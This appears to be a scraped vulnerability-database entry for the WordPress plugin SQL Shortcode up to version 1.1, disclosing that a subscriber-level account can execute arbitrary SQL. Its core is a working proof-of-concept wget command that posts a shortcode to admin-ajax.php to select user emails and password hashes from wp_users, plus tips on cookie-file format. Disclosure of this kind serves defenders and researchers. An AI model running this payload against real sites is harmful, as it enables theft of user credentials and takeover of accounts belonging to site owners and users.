Lucene search

K
wpexploitPaul DannewitzWPEX-ID:679DD99D-7227-4C73-BD76-949E38B59220
HistorySep 02, 2017 - 12:00 a.m.

SQL Shortcode <= 1.1 - Authenticated SQL Execution

2017-09-0200:00:00
Paul Dannewitz
15

It’s not an SQL injection actually, it’s just executing SQL with an account as low-privileged as a subscriber. The plugin description says it all. This (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) great article will help understanding how to exploit shortcodes and why this works. Vulnerabilities: Execute whatever SQL you want to execute. Found by: Paul Dannewitz Other vulnerabilities I submitted to wpvulndb: https://wpvulndb.com/search?utf8=βœ“&amp;text;=Paul+Dannewitz

wget --load-cookies cookie_file_with_cookies_of_just_a_subscriber_account.txt --post-data="action=parse-media-shortcode&shortcode=[sql]SELECT user_email, user_pass FROM wp_users[/sql]" wordpress.app/wp-admin/admin-ajax.php

Make sure the cookie file has the right format (Netscape), useful converter: http://crdx.org/misc/cookies/